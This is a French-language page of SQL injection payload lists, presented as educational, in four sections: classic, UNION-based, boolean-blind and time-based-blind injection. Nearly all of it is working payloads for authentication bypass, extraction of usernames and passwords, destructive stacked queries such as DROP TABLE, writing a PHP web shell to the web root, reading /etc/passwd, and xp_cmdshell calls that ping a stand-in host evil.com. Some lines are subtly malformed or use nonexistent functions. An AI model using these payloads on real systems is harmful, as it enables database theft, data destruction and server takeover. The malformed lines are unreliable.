🎯 Exemples recommandés
Balanced sample collections from various categories for you to explore
Exemples d'Injections SQL
Collection éducative de payloads d'injection SQL pour les tests de sécurité, l'évaluation des vulnérabilités et les pratiques de codage défensif
📝 Motifs d'Injection SQL Classiques sql
🟢 simple
⭐⭐
Techniques fondamentales d'injection SQL - contournement d'authentification, OR 1=1, UNION SELECT, injections basées sur les commentaires et énumération de bases de données
⏱️ 20 min
🏷️ sql, injection, database, security, bypass
# Classic SQL Injection Patterns
# Fundamental SQL injection techniques that form the basis for most attacks
# Authentication bypass with OR 1=1
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 'a'='a
" OR "a"="a
admin' OR '1'='1'--
admin" OR "1"="1"--
'or'1'='1
"or"1"="1
# Tautology-based injections (always true conditions)
' OR 1=1#
' OR 1=1--
' OR 1=1/*
" OR 1=1#
" OR 1=1--
' OR '1'='1'#
" OR "1"="1"#
admin' OR '1'='1'#
admin" OR "1"="1"#
# Comment-based injections to bypass remaining query
' OR 1=1--
' OR 1=1#
' OR 1=1/*
" OR 1=1--
" OR 1=1#
" OR 1=1/*
' OR '1'='1'--
" OR "1"="1"--
# Union select for data extraction
' UNION SELECT NULL--
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL, NULL--
" UNION SELECT NULL#
" UNION SELECT NULL, NULL#
" UNION SELECT NULL, NULL, NULL#
# Admin bypass with specific username
admin'--
admin'#
admin'/*
admin"--
admin"#
admin"/*
# Boolean-based testing
' AND 1=1--
' AND 1=2--
' AND '1'='1
" AND "1"="1
' AND 'a'='a
" AND "a"="a
# Order by enumeration (column counting)
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 4--
1' ORDER BY 5--
1' ORDER BY 6--
1' ORDER BY 7--
1' ORDER BY 8--
1' ORDER BY 9--
1' ORDER BY 10--
# Error-based injection attempts
' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CAST((SELECT table_name FROM information_schema.tables) AS int)--
' AND 1=(SELECT COUNT(*) FROM information_schema.tables)--
# Time-based injection basics
' WAITFOR DELAY '00:00:05'--
' AND SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
' OR pg_sleep(5)--
# Stacked queries (multiple statements)
'; DROP TABLE users--
'; DROP TABLE users#
' ; DROP TABLE users --
'; DELETE FROM users WHERE '1'='1
'; INSERT INTO users (username, password) VALUES ('hacker', 'pwned')--
# Database version extraction
' UNION SELECT @@version--
' UNION SELECT version()--
' UNION SELECT @@version, NULL, NULL--
' UNION SELECT version(), NULL, NULL, NULL--
# Table name enumeration
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT table_name, table_type FROM information_schema.tables--
' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema=database()--
# Column name enumeration
' UNION SELECT column_name FROM information_schema.columns--
' UNION SELECT column_name, data_type FROM information_schema.columns--
' UNION SELECT column_name, NULL, NULL FROM information_schema.columns WHERE table_name='users'--
# Data extraction from users table
' UNION SELECT username, password FROM users--
' UNION SELECT username, password, email FROM users--
' UNION SELECT NULL, username, password FROM users--
' UNION SELECT NULL, NULL, username, password FROM users--
# Bypassing login with comment truncation
admin'--
admin'#
admin'/*' OR '1'='1
admin'/*' OR '1'='1'--
# MySQL specific injections
' OR 1=1#
' OR 1=1--
' OR '1'='1'#
" OR "1"="1"#
' UNION SELECT database()#
' UNION SELECT user()#
' UNION SELECT @@version#
# SQL Server specific injections
' OR 1=1--
' UNION SELECT @@version--
' UNION SELECT db_name()--
' UNION SELECT system_user--
'; EXEC xp_cmdshell('dir')--
# Oracle specific injections
' OR '1'='1'--
' UNION SELECT banner FROM v$version--
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
# PostgreSQL specific injections
' OR 1=1--
' UNION SELECT version()--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns--
' OR pg_sleep(5)--
# SQLite specific injections
' OR '1'='1'--
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name, sql FROM sqlite_master WHERE type='table'--
# Access control bypass
' OR '1'='1' LIMIT 1--
' OR '1'='1' OR '1'='2--
admin' OR '1'='1'--
' OR user_id='admin'--
# Second-order injection (stored in database)
admin'; INSERT INTO logs (message) VALUES ('Hacked');--
admin'; DROP TABLE logs;--
# Blind SQL injection tests
' AND 1=1 AND '1'='1
' AND 1=2 AND '1'='1
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a
' AND ASCII(SUBSTRING((SELECT database()),1,1))>64
# Logic testing
' AND 1=1#
' AND 1=2#
' AND 1=1--
' AND 1=2--
' OR 1=1#
' OR 1=2#
# Encoding bypass attempts
%27%20OR%20%271%27%3D%271
%27%20UNION%20SELECT%20NULL--
\%27\%20OR\%20\%271\%27=\%27\%27
# HTTP parameter pollution
id=1' OR '1'='1&id=2
username=admin&username=' OR '1'='1
# Cookie-based injection
Cookie: sessionid=' OR '1'='1
Cookie: user_id=' UNION SELECT NULL--
# User-Agent injection
User-Agent: ' OR '1'='1
User-Agent: ' UNION SELECT @@version--
# Referer injection
Referer: ' OR '1'='1
Referer: ' UNION SELECT user()--
# X-Forwarded-For injection
X-Forwarded-For: ' OR '1'='1
X-Forwarded-For: ' UNION SELECT database()--📝 Injections SQL Basées sur UNION sql
🟡 intermediate
⭐⭐⭐
Injection SQL avancée utilisant UNION SELECT pour extraire des données d'autres tables - énumération de colonnes, prise d'empreinte de base de données et extraction de données
⏱️ 25 min
🏷️ sql, union, injection, database, extraction
# UNION-based SQL Injection Vectors
# Advanced SQL injection using UNION SELECT to extract data from other tables
# Basic UNION syntax
' UNION SELECT NULL--
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL, NULL--
" UNION SELECT NULL#
" UNION SELECT NULL, NULL#
" UNION SELECT NULL, NULL, NULL#
# Column enumeration with ORDER BY
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 4--
1' ORDER BY 5--
1' ORDER BY 6--
1' ORDER BY 7--
1' ORDER BY 8--
1' ORDER BY 9--
1' ORDER BY 10--
# Database fingerprinting
' UNION SELECT @@version--
' UNION SELECT version()--
' UNION SELECT @@version, NULL--
' UNION SELECT version(), NULL, NULL--
' UNION SELECT @@version, NULL, NULL, NULL--
# Database name extraction
' UNION SELECT database()#
' UNION SELECT db_name()--
' UNION SELECT database(), NULL--
' UNION SELECT database(), NULL, NULL--
' UNION SELECT db_name(), NULL, NULL--
# Current user extraction
' UNION SELECT user()#
' UNION SELECT system_user--
' UNION SELECT current_user--
' UNION SELECT user(), NULL--
' UNION SELECT system_user, NULL--
# Table enumeration
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT table_name, NULL FROM information_schema.tables--
' UNION SELECT table_name, table_type FROM information_schema.tables--
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='public'--
# Column enumeration
' UNION SELECT column_name FROM information_schema.columns--
' UNION SELECT column_name, data_type FROM information_schema.columns--
' UNION SELECT column_name, NULL, NULL FROM information_schema.columns--
' UNION SELECT column_name, data_type, character_maximum_length FROM information_schema.columns--
# Column enumeration for specific table
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT column_name, data_type FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users' AND table_schema=database()--
# Data extraction from users table
' UNION SELECT username, password FROM users--
' UNION SELECT username, password, email FROM users--
' UNION SELECT username, password, NULL FROM users--
' UNION SELECT NULL, username, password FROM users--
' UNION SELECT username, password FROM users WHERE '1'='1--
# Data extraction with specific conditions
' UNION SELECT username, password FROM users WHERE username='admin'--
' UNION SELECT username, password FROM users WHERE id=1--
' UNION SELECT username, password FROM users WHERE user_id='admin'--
' UNION SELECT * FROM users--
# Multiple UNION operations
' UNION SELECT NULL, NULL UNION SELECT NULL, NULL--
' UNION SELECT username FROM users UNION SELECT password FROM users--
' UNION SELECT username FROM users UNION SELECT email FROM users UNION SELECT password FROM users--
# UNION with database functions
' UNION SELECT @@version, database(), user()--
' UNION SELECT version(), current_database(), current_user--
' UNION SELECT @@version, db_name(), system_user--
' UNION SELECT version(), database(), user(), NULL--
# UNION with string functions
' UNION SELECT concat(username, ':', password) FROM users--
' UNION SELECT concat_ws(':', username, password) FROM users--
' UNION SELECT username || ':' || password FROM users--
' UNION SELECT group_concat(username) FROM users--
# UNION with aggregate functions
' UNION SELECT COUNT(*) FROM users--
' UNION SELECT MAX(id), MIN(id) FROM users--
' UNION SELECT SUM(amount), AVG(amount) FROM transactions--
' UNION SELECT COUNT(DISTINCT username) FROM users--
# UNION with conditional logic
' UNION SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END--
' UNION SELECT CASE WHEN username='admin' THEN password ELSE NULL END FROM users--
' UNION SELECT IF(1=1, 'true', 'false')--
' UNION SELECT IIF(1=1, 'true', 'false')--
# UNION with subqueries
' UNION SELECT (SELECT password FROM users WHERE username='admin')--
' UNION SELECT (SELECT COUNT(*) FROM information_schema.tables)--
' UNION SELECT (SELECT table_name FROM information_schema.tables LIMIT 1)--
# UNION ALL to include duplicates
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL, NULL--
' UNION ALL SELECT username, password FROM users--
' UNION ALL SELECT username FROM users UNION ALL SELECT password FROM users--
# UNION DISTINCT to remove duplicates
' UNION DISTINCT SELECT username FROM users--
' UNION DISTINCT SELECT password FROM users--
' UNION DISTINCT SELECT email FROM users--
# MySQL specific UNION injections
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()#
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'#
' UNION SELECT concat(user, ':', password) FROM mysql.user#
' UNION SELECT grantee, privilege_type FROM information_schema.user_privileges#
# SQL Server specific UNION injections
' UNION SELECT name FROM sys.tables--
' UNION SELECT name FROM sys.columns WHERE object_id=OBJECT_ID('users')--
' UNION SELECT name, type_desc FROM sys.tables--
' UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'--
# Oracle specific UNION injections
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
' UNION SELECT banner FROM v$version--
' UNION SELECT owner, table_name FROM all_tables--
# PostgreSQL specific UNION injections
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='public'--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT datname FROM pg_database--
' UNION SELECT usename FROM pg_user--
# SQLite specific UNION injections
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name, sql FROM sqlite_master WHERE type='table'--
' UNION SELECT tbl_name FROM sqlite_master WHERE type='table'--
' UNION SELECT sql FROM sqlite_master WHERE type='index'--
# UNION with time delays
' UNION SELECT SLEEP(5)--
' UNION SELECT pg_sleep(5)--
' UNION SELECT WAITFOR DELAY '00:00:05'--
' UNION SELECT BENCHMARK(5000000, MD5(1))--
# UNION with file operations (MySQL)
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT 1,2,3 INTO OUTFILE '/var/www/html/shell.php'--
' UNION SELECT NULL, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php'--
# UNION with system commands (SQL Server)
' UNION SELECT NULL, NULL, NULL, EXEC xp_cmdshell('dir')--
' UNION SELECT NULL, NULL, NULL, EXEC master..xp_cmdshell 'ping evil.com'--
# Advanced data extraction techniques
' UNION SELECT group_concat(concat(username, ':', password)) FROM users--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 2--
# UNION with JOIN operations
' UNION SELECT u.username, u.password, r.role_name FROM users u JOIN roles r ON u.role_id = r.id--
' UNION SELECT t1.column1, t2.column2 FROM table1 t1 JOIN table2 t2 ON t1.id = t2.id--
# Error-based UNION injections
' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CAST((SELECT table_name FROM information_schema.tables) AS int)--
' AND 1=(SELECT COUNT(*) FROM information_schema.tables)--
# Blind UNION injections
' AND (SELECT COUNT(*) FROM information_schema.tables) > 5--
' AND (SELECT LENGTH((SELECT password FROM users WHERE username='admin'))) > 5--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 64--
' AND (SELECT SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) = 'a'--📝 Injections SQL Aveugles Basées sur des Booléens sql
🟡 intermediate
⭐⭐⭐
Injection SQL aveugle exploitant des conditions vraies/fausses - énumération de bases de données, extraction de données via la logique booléenne et tests conditionnels
⏱️ 30 min
🏷️ sql, blind, boolean, injection, database
# Boolean-based Blind SQL Injection Vectors
# SQL injection techniques that exploit true/false conditions without returning data
# Basic boolean testing
' AND 1=1--
' AND 1=2--
' AND '1'='1
" AND "1"="1
' AND 'a'='a
" AND "a"="a
# Tautology-based boolean injections
' OR 1=1--
' OR '1'='1
" OR 1=1--
" OR "1"="1
admin' OR '1'='1'--
admin" OR "1"="1"--
# Contradiction-based boolean injections
' AND 1=2--
' AND '1'='2
" AND 1=2--
" AND "1"="2
admin' AND '1'='2'--
# Subquery boolean testing
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables) > 5--
' AND (SELECT COUNT(*) FROM information_schema.columns) > 10--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') = 1--
# Database name length checking
' AND LENGTH((SELECT database())) > 0--
' AND LENGTH((SELECT database())) > 5--
' AND LENGTH((SELECT database())) = 8--
' AND LENGTH((SELECT database())) < 10--
# Database name character by character extraction
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 64--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 96--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) = 115--
' AND ASCII(SUBSTRING((SELECT database()),2,1)) > 64--
' AND ASCII(SUBSTRING((SELECT database()),2,1)) = 101--
# Table name existence checking
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users') = 1--
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users') > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name LIKE 'user%') > 0--
# Table name length checking
' AND LENGTH((SELECT table_name FROM information_schema.tables LIMIT 1)) > 0--
' AND LENGTH((SELECT table_name FROM information_schema.tables LIMIT 1)) = 5--
' AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_name='users')) = 5--
# Column name existence checking
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE column_name='password') > 0--
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE column_name='username') > 0--
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' AND column_name='password') = 1--
# Data existence checking
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin' AND password='password123') > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') = 1--
# Password length checking
' AND LENGTH((SELECT password FROM users WHERE username='admin')) > 0--
' AND LENGTH((SELECT password FROM users WHERE username='admin')) = 32--
' AND LENGTH((SELECT password FROM users WHERE username='admin')) < 64--
# Password character by character extraction
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) > 64--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) = 97--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1)) > 64--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1)) = 98--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a'--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1) = 'b'--
# Version checking
' AND (SELECT LENGTH(VERSION())) = 23--
' AND ASCII(SUBSTRING(VERSION(),1,1)) > 48--
' AND ASCII(SUBSTRING(VERSION(),1,1)) = 53--
' AND SUBSTRING(VERSION(),1,1) = '5'--
# User checking
' AND (SELECT COUNT(*) FROM information_schema.users WHERE username='admin') > 0--
' AND (SELECT USER()) = 'root@localhost'--
' AND (SELECT CURRENT_USER()) = 'admin'@'%'--
# Privilege checking
' AND (SELECT COUNT(*) FROM information_schema.user_privileges WHERE grantee LIKE '%admin%') > 0--
' AND (SELECT super_priv FROM mysql.user WHERE user='root') = 'Y'--
' AND (SELECT is_role_enabled('admin')) = 1--
# File existence checking
' AND (SELECT COUNT(*) FROM information_schema.files WHERE file_name='/etc/passwd')) > 0--
' AND (SELECT file_exists('/etc/passwd')) = 1--
# Conditional error-based boolean
' AND (SELECT 1 FROM information_schema.tables) = 1--
' AND (SELECT 1 FROM users WHERE username='admin') = 1--
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables) > 0--
# Time-based boolean variations
' AND SLEEP(5)--
' AND pg_sleep(5)--
' AND WAITFOR DELAY '00:00:05'--
' AND BENCHMARK(5000000, MD5(1))--
# Case sensitivity testing
' AND BINARY('admin') = 'admin'--
' AND BINARY('ADMIN') = 'admin'--
' AND BINARY((SELECT username FROM users WHERE id=1)) = 'admin'--
# NULL testing
' AND (SELECT password FROM users WHERE username='admin') IS NULL--
' AND (SELECT COUNT(*) FROM users WHERE password IS NULL) > 0--
' AND (SELECT email FROM users WHERE username='admin') IS NOT NULL--
# Range-based boolean testing
' AND (SELECT COUNT(*) FROM users) BETWEEN 1 AND 100--
' AND (SELECT COUNT(*) FROM users) >= 10--
' AND (SELECT COUNT(*) FROM users) <= 1000--
' AND (SELECT id FROM users WHERE username='admin') BETWEEN 1 AND 100--
# Pattern matching boolean
' AND (SELECT username FROM users WHERE id=1) LIKE 'admin%'--
' AND (SELECT password FROM users WHERE username='admin') LIKE '%123%'--
' AND (SELECT email FROM users WHERE username='admin') LIKE '%@example.com'--
' AND (SELECT database()) LIKE 'test%'--
# String comparison boolean
' AND (SELECT database()) = 'testdb'--
' AND (SELECT username FROM users WHERE id=1) = 'admin'--
' AND (SELECT password FROM users WHERE username='admin') = 'password123'--
' AND (SELECT table_name FROM information_schema.tables LIMIT 1) = 'users'--
# Numeric comparison boolean
' AND (SELECT COUNT(*) FROM users) > 10--
' AND (SELECT id FROM users WHERE username='admin') = 1--
' AND (SELECT LENGTH(password) FROM users WHERE username='admin') = 32--
' AND (SELECT ASCII(SUBSTRING(password,1,1)) FROM users WHERE username='admin') = 97--
# Boolean logic combinations
' AND 1=1 AND 2=2--
' AND 1=1 AND 2=3--
' AND (1=1 OR 2=2) AND 3=3--
' AND ((1=1) OR (2=2)) AND (3=3 OR 4=4)--
# Nested boolean conditions
' AND ((SELECT COUNT(*) FROM users) > 0 AND (SELECT COUNT(*) FROM admins) > 0)--
' AND ((SELECT database()) = 'testdb' OR (SELECT database()) = 'devdb')--
' AND (LENGTH((SELECT password FROM users WHERE username='admin')) > 0 AND LENGTH((SELECT password FROM users WHERE username='admin')) < 64)--
# Boolean with GROUP BY
' AND (SELECT COUNT(*) FROM (SELECT username FROM users GROUP BY username) AS temp) > 0--
' AND (SELECT COUNT(DISTINCT username) FROM users) > 10--
# Boolean with HAVING
' AND (SELECT COUNT(*) FROM users GROUP BY username HAVING COUNT(*) > 1) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables GROUP BY table_schema HAVING COUNT(*) > 5) > 0--
# Boolean with ORDER BY
' AND (SELECT username FROM users ORDER BY username LIMIT 1) = 'admin'--
' AND (SELECT table_name FROM information_schema.tables ORDER BY table_name LIMIT 1) = 'accounts'--
# Boolean with LIMIT and OFFSET
' AND (SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0) = 'users'--
' AND (SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1) = 'accounts'--
' AND (SELECT username FROM users LIMIT 1 OFFSET 0) = 'admin'--
# Database-specific boolean injections
# MySQL
' AND (SELECT @@version) = '5.7.25'--
' AND (SELECT database()) = 'testdb'--
' AND (SELECT user()) = 'root@localhost'--
# SQL Server
' AND (SELECT @@version) LIKE '%SQL Server%'--
' AND (SELECT db_name()) = 'testdb'--
' AND (SELECT system_user) = 'dbo'--
# Oracle
' AND (SELECT banner FROM v$version WHERE ROWNUM=1) LIKE '%Oracle%'--
' AND (SELECT user FROM dual) = 'ADMIN'--
' AND (SELECT table_name FROM all_tables WHERE ROWNUM=1) = 'USERS'--
# PostgreSQL
' AND (SELECT version()) LIKE '%PostgreSQL%'--
' AND (SELECT current_database()) = 'testdb'--
' AND (SELECT current_user) = 'postgres'--
# SQLite
' AND (SELECT sql FROM sqlite_master WHERE type='table' LIMIT 1) LIKE '%users%'--
' AND (SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) = 'users'--📝 Injections SQL Aveugles Basées sur le Temps sql
🔴 complex
⭐⭐⭐⭐
Injection SQL utilisant le temps de réponse de la base de données - SLEEP(), WAITFOR DELAY, BENCHMARK() et techniques d'extraction de données basées sur le temps
⏱️ 35 min
🏷️ sql, blind, time-based, injection, database
# Time-based Blind SQL Injection Vectors
# SQL injection techniques that use database response time to extract data
# Basic time-based injections
' WAITFOR DELAY '00:00:05'--
'; WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--
' OR SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
' OR pg_sleep(5)--
'; SELECT SLEEP(5)--
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
# MySQL time-based injections
' AND SLEEP(5)--
' OR SLEEP(10)--
' AND BENCHMARK(5000000, MD5(1))--
' AND BENCHMARK(50000000, MD5(1))--
' OR BENCHMARK(5000000, SHA1(1))--
' AND SLEEP(5) AND '1'='1
' AND SLEEP(10) AND 'a'='a
' OR SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
'; SELECT SLEEP(5)--
# SQL Server time-based injections
' WAITFOR DELAY '00:00:05'--
'; WAITFOR DELAY '0:0:5'--
' WAITFOR DELAY '00:00:10'--
'; WAITFOR DELAY '0:0:10'--
' AND WAITFOR DELAY '00:00:05'--
' OR WAITFOR DELAY '00:00:05'--
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
' OR DBMS_PIPE.RECEIVE_MESSAGE('x', 10)--
# PostgreSQL time-based injections
' OR pg_sleep(5)--
' AND pg_sleep(10)--
'; SELECT pg_sleep(5)--
' OR pg_sleep(10)--
' AND pg_sleep(5) AND '1'='1--
' OR pg_sleep(5) AND 'a'='a--
# Oracle time-based injections
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
' OR DBMS_PIPE.RECEIVE_MESSAGE('x', 10)--
' AND DBMS_LOCK.SLEEP(5)--
' OR DBMS_LOCK.SLEEP(10)--
'; EXEC DBMS_PIPE.RECEIVE_MESSAGE('x', 5)--
# SQLite time-based injections (using heavy queries)
' AND (SELECT COUNT(*) FROM (SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_master))--
' AND (SELECT COUNT(*) FROM (SELECT * FROM sqlite_master CROSS JOIN sqlite_master CROSS JOIN sqlite_master))--
' AND (SELECT COUNT(*) FROM (SELECT * FROM users CROSS JOIN users CROSS JOIN users CROSS JOIN users CROSS JOIN users))--
# Database name extraction with time delays
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT database()),1,1))>64,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT current_database()),1,1))>64 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN ASCII(SUBSTRING((SELECT db_name()),1,1))>64 THEN '00:00:05' ELSE '00:00:00' END--
# Table name extraction with time delays
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0,5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users')>0 THEN '00:00:05' ELSE '00:00:00' END--
# Data extraction with time delays
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1))>64 THEN '00:00:05' ELSE '00:00:00' END--
# Character by character extraction with time
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT database()),1,1))=115,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT database()),1,1))=115 THEN 5 ELSE 0 END)--
' AND BENCHMARK(5000000, MD5(IF(ASCII(SUBSTRING((SELECT database()),1,1))=115,'true','false')))--
# Conditional time-based queries
' AND SLEEP(IF((SELECT COUNT(*) FROM users)>0,5,0))--
' AND SLEEP(IF((SELECT database())='testdb',5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)>5 THEN 5 ELSE 0 END)--
' AND WAITFOR DELAY CASE WHEN (SELECT COUNT(*) FROM users)>0 THEN '00:00:05' ELSE '00:00:00' END--
# Heavy query time delays for databases without sleep functions
' AND (SELECT COUNT(*) FROM (SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users UNION SELECT * FROM users) AS temp) > 0--
' AND (SELECT COUNT(*) FROM (SELECT * FROM information_schema.tables a CROSS JOIN information_schema.tables b CROSS JOIN information_schema.tables c) AS temp) > 0--
# Multiple time delays for confirmation
' AND SLEEP(5) AND SLEEP(5)--
' AND pg_sleep(5) AND pg_sleep(5)--
' WAITFOR DELAY '00:00:05' WAITFOR DELAY '00:00:05'--
' AND BENCHMARK(5000000, MD5(1)) AND BENCHMARK(5000000, MD5(1))--
# Variable time delays for bit extraction
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 128)=128,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 64)=64,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 32)=32,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 16)=16,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 8)=8,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 4)=4,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 2)=2,5,0))--
' AND SLEEP(IF((ASCII(SUBSTRING((SELECT database()),1,1)) & 1)=1,5,0))--
# Time-based data length extraction
' AND SLEEP(IF(LENGTH((SELECT database()))>5,5,0))--
' AND pg_sleep(CASE WHEN LENGTH((SELECT database()))>5 THEN 5 ELSE 0 END)--
' AND SLEEP(IF(LENGTH((SELECT password FROM users WHERE username='admin'))>10,5,0))--
# Time-based counting queries
' AND SLEEP(IF((SELECT COUNT(*) FROM users)>10,5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)>5 THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN (SELECT COUNT(*) FROM users)>0 THEN '00:00:05' ELSE '00:00:00' END--
# Time-based version detection
' AND SLEEP(IF(SUBSTRING(VERSION(),1,1)='5',5,0))--
' AND pg_sleep(CASE WHEN SUBSTRING(VERSION(),1,1)='9' THEN 5 ELSE 0 END)--
' WAITFOR DELAY CASE WHEN @@VERSION LIKE '%SQL Server%' THEN '00:00:05' ELSE '00:00:00' END--
# Time-based user privilege detection
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.user_privileges WHERE grantee LIKE '%admin%')>0,5,0))--
' AND pg_sleep(CASE WHEN (SELECT super_priv FROM mysql.user WHERE user='root')='Y' THEN 5 ELSE 0 END)--
# Time-based file existence check
' AND SLEEP(IF((SELECT COUNT(*) FROM information_schema.files WHERE file_name='/etc/passwd'))>0,5,0))--
' AND pg_sleep(CASE WHEN (SELECT file_exists('/etc/passwd'))=1 THEN 5 ELSE 0 END)--
# Advanced time-based techniques
' AND SLEEP(IF(ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) BETWEEN 97 AND 122,5,0))--
' AND pg_sleep(CASE WHEN ASCII(SUBSTRING((SELECT database()),1,1)) IN (115, 116, 117) THEN 5 ELSE 0 END)--
' AND SLEEP(IF((SELECT database()) LIKE 't%',5,0))--
' AND pg_sleep(CASE WHEN (SELECT database()) LIKE '%test%' THEN 5 ELSE 0 END)--
# Time-based with mathematical operations
' AND SLEEP(IF((SELECT COUNT(*) FROM users)*2>10,5,0))--
' AND pg_sleep(CASE WHEN (SELECT COUNT(*) FROM information_schema.tables)/2>3 THEN 5 ELSE 0 END)--
' AND SLEEP(IF(LENGTH((SELECT database()))*2>10,5,0))--
# Stacked queries with time delays
'; SELECT SLEEP(5)--
'; WAITFOR DELAY '00:00:05'--
'; SELECT pg_sleep(5)--
'; EXEC('WAITFOR DELAY ''00:00:05''')--
'; EXEC('SELECT SLEEP(5)')--
